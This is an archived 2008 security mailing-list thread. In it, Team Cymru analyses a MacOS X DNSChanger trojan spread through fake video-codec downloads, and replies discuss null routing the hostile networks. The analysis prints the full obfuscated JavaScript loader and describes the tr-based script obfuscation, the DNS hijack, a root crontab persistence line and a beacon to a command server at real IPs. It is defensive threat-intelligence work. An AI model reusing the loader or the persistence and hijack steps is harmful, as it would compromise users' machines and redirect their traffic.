[nsp-sec] [ OT ] MacOS X malware
David Freedman
david.freedman at uk.clara.net
Wed Apr 2 16:22:28 EDT 2008
I think there is a very valid point here, RBLs maintain lists of varying levels of "questionability" which are implemented on
and entirely "opt-in" basis, whereby if you do not agree with the listing you simply do not use the list.
I suggest Cymru adopt a similar set of "more questionable" feeds which we can choose to use or not (providing we don't complain what is on them or ask for anything to be removed without a damn good reason)
Dave.
------------------------------------------------
David Freedman
Group Network Engineering
Claranet Limited
http://www.clara.net
From: Rob Thomas
Sent: Wed 4/2/2008 21:19
To: Brian Eckman
Cc: nsp-security at puck.nether.net
Subject: Re: [nsp-sec] [ OT ] MacOS X malware
----------- nsp-security Confidential --------
Thanks, Brian!
Wise call on the null routing. Must...avoid...altering...the DDoS-RS... ;)
Brian Eckman wrote:
> Rob,
>
> I'm sure this isn't news to you, but it might help clarify things for
> others. This is the Mac equivalent of Zlob (aka generically as
> DNSChanger). The two DNS servers given to infected hosts will be within
> the 85.255.112.0/20 network - I think almost always within
> 85.255.112.0/22. Based on my observations, I'd guarantee there are over
> 229 infected Macs in Minnesota alone, not to mention 50x that in Windows
> boxes.
>
> I've heard other rumors (besides the livejournal link you provided) that
> RBN is involved with Zlob, but I've never heard more than highly
> speculative comments. Regardless, the folks behind this line of malware
> are clearly very well funded and well organized. It's getting disgusting
> how long this line of malware has been around and how many *millions*[1]
> of hosts have been infected, and yet there is little to no press
> attention given to it (and who knows how much/little LE attention). They
> own a massive number of domains, generate a huge quantity of malware,
> make millions off of numerous bogus anti-spyware programs (almost
> certainly created in house) as well as large commissions from some
> gray-ish anti-spyware, and historically, even commissions from affiliate
> networks such as (but not limited to) amazon.com's "Associates" program.
>
> We have been null routing 85.255.112.0/20 for nearly two years now, as
> well as some other Intercage IP space.
>
> Cheers,
> Brian
>
> [1]
> http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx
> provides some reference as to how big the Zlob problem is. One week
> after the Sept, 2007 MSRT was released, the Zlob family had been removed
> from 664,258 machines. This was the same month MSRT first got rid of
> Storm; that was removed from 274,372 machines in the same time period.
> Granted, Zlob had about a two year head start... (But I wonder how many
> infected machines had already been cleaned/reinstalled/recycled by then?)
>
> Rob Thomas wrote:
>> ----------- nsp-security Confidential --------
>>
>> Hi, team.
>>
>> Given the large number of Mac users in this community, and given that
>> this collection of dodgy web sites are infecting Windows and MacOS X,
>> I thought this was reasonably appropriate for this list. Some folks
>> on this list might want to take action against some of these IPs.
>>
>> Yes it's true - there is malware for the MacOS X platform. While this
>> report will cover a recent release, the malware itself isn't new and
>> hacking MacOS X isn't new, either.
>>
>> You can read a public blog post and some useful follow-ups at the
>> following URL:
>>
>> <http://tacit.livejournal.com/238112.html>
>>
>> Here is our analysis. Some of these links are rude even in name, and
>> all of them are unsafe.
>>
>> The fun begins with at least one porn site. The site brings the user
>> through a few redirects to a site here:
>>
>> 88.85.72.147
>>
>> AS | IP | BGP Prefix | CC | Registry |
>> Allocated | AS Name
>> 35415 | 88.85.72.147 | 88.85.64.0/19 | NL | ripencc |
>> 2006-02-08 | WEBAZILLA WebaZilla European Network
>>
>> The page there loads some fun Javascript:
>>
>> var str=["332", "331", "331", "331", "440", "419", "436",
>> "354", "434", "433", "440", "383", "370", "381", "332",
>> "331", "331", "331", "424", "439", "432", "421", "438",
>> "427", "433", "432", "354", "443", "441", "439", "427",
>> "422", "420", "430", "444", "433", "427", "362", "435",
>> "439", "423", "436", "443", "363", "445", "332", "331",
>> "331", "331", "331", "441", "427", "432", "422", "433",
>> "441", "368", "430", "433", "421", "419", "438", "427",
>> "433", "432", "383", "361", "426", "438", "438", "434",
>> "380", "369", "369", "430", "419", "432", "422", "427",
>> "432", "425", "426", "419", "430", "430", "368", "421",
>> "433", "431", "369", "427", "432", "368", "421", "425",
>> "427", "385", "373", "361", "381", "332", "331", "331",
>> "331", "447"];
>> var temp='';
>> var gg='';
>> for (i=0; i<str.length; i++){
>> gg=str[i]-322;
>> temp=temp+String.fromCharCode(gg);
>> }
>> eval(temp);
>>
>> This translates to (I've heavily obfuscated the URL below):
>>
>> var pov=0;
>> function ywuidblzoi(query){
>> window.location='h x x p : / / landinghall . com / in.cgi?3';
>> }
>>
>> The host landinghall.com resolves to 88.214.202.180, located at the
>> following provider:
>>
>> AS | IP | BGP Prefix | CC | Registry |
>> Allocated | AS Name
>> 23393 | 88.214.202.180 | 88.214.192.0/18 | GB | ripencc |
>> 2006-01-18 | ISPRIME - ISPrime, Inc.
>>
>> In addition to the malware, the images are extremely graphic.
>> Consider yourself warned.
>>
>> The web site determines the visitor's OS and then decides which malware
>> to offer. This is masked as a video codec to play the porn
>> available on this "PornTube" (their name) site.
>>
>> Note well that if the browser has pop-ups blocked, there is no risk to
>> MacOS X users so far as we can discern.
>>
>> At this point the MacOS X user is prompted to download a disk image for
>> installation. This image is named 1023.dmg and is served from:
>>
>> 64.28.178.27, 64-28-178-27-rev.cernel.net
>>
>> AS | IP | BGP Prefix | CC | Registry |
>> Allocated | AS Name
>> 27595 | 64.28.178.27 | 64.28.176.0/20 | US | arin |
>> 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The MacOS X user *must* provide his or her password to enable the
>> installation of this malware masked as a video player. This is not a
>> 0day attack - it is social engineering.
>>
>> The preinstall and preupgrade scripts are the same and contain 25 lines.
>> Both use an interesting obfuscation technique - the Unix tr(1) command.
>>
>> The script first cat(1)'s itself and pipes bottom 23 lines of itself
>> through tr(1). The first tr(1) round does the following (I've cleaned
>> this up a bit to make it more legible):
>>
>> tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
>>
>> It next sets two variables:
>>
>> s1 = cx.zxx.aas.xd
>> s2 = cx.zxx.aaz.ace
>>
>> The script called "1" is now run with these two variables as arguments,
>> piped through tr(1) again (line split to make it more legible):
>>
>> sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
>> `echo $s2| tr qazwsxedcr 0123456789`
>>
>> The tr(1) command translates those two "strings" into the following two
>> IP addresses:
>>
>> s1 = 85.255.114.57
>> s2 = 85.255.112.186
>>
>> Those IPs belong to:
>>
>> AS | IP | BGP Prefix | CC | Registry |
>> Allocated | AS Name
>> 27595 | 85.255.114.57 | 85.255.114.0/23 | UA | ripencc |
>> 2005-06-16 | INTERCAGE - InterCage, Inc.
>>
>> AS | IP | BGP Prefix | CC | Registry |
>> Allocated | AS Name
>> 36445 | 85.255.112.186 | 85.255.112.0/24 | UA | ripencc |
>> 2005-06-16 | CERNEL-ASN - Cernel, Inc
>>
>> The script called "1" looks for some basic IPv4 settings on the Mac.
>> It then replaces the DNS name servers in the netinfo database with
>> 85.255.114.57 and 85.255.112.186. Any DNS queries from the compromised
>> Mac are now sent to these two name servers.
>>
>> Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.
>>
>> These IPs are no stranger to badness. We count 17 distinct samples in
>> our malware menagerie that reference 85.255.114.57. The host at
>> 85.255.112.186 has been involved with at least 60 malware samples that
>> hijack DNS settings.
>>
>> If a query is made for a non-existant DNS RR, these DNS name servers
>> return an answer of 64.28.185.108.
>>
>> 64.28.185.108, 64-28-185-108-rev.cernel.net
>>
>> AS | IP | BGP Prefix | CC | Registry |
>> Allocated | AS Name
>> 27595 | 64.28.185.108 | 64.28.176.0/20 | US | arin |
>> 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The script then installs itself into root's crontab as:
>>
>> * * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"
>>
>> By default there is no root crontab on MacOS X, so this one really
>> stands out.
>>
>> The QuickTime.xpt script is just a copy of the "1" script. This will
>> now run once per minute, as root, ensuring the malware and the DNS
>> changes aren't removed or lost for long.
>>
>> A Perl script named "sendreq" is run and deleted. This script is a
>> beacon, sending the output of "uname -p" (the machine processor
>> architecture name, e.g. "i386") and the hostname(1) command to a web
>> server. The web server is:
>>
>> 64.28.188.220, 64-28-188-220-rev.cernel.net
>>
>> AS | IP | BGP Prefix | CC | Registry |
>> Allocated | AS Name
>> 27595 | 64.28.188.220 | 64.28.176.0/20 | US | arin |
>> 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> This is done as a HTTP GET command from the compromised Mac, with the
>> Accept-Language: field set to the information obtained from the
>> uname(1) and hostname(1) commands run on the compromised Mac.
>>
>> We see at least 227 victims, mostly in the US.
>>
>> Thanks,
>> Rob.
--
Rob Thomas
Team Cymru
The WHO and WHY team
http://www.team-cymru.org/
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________
More information about the nsp-security
mailing list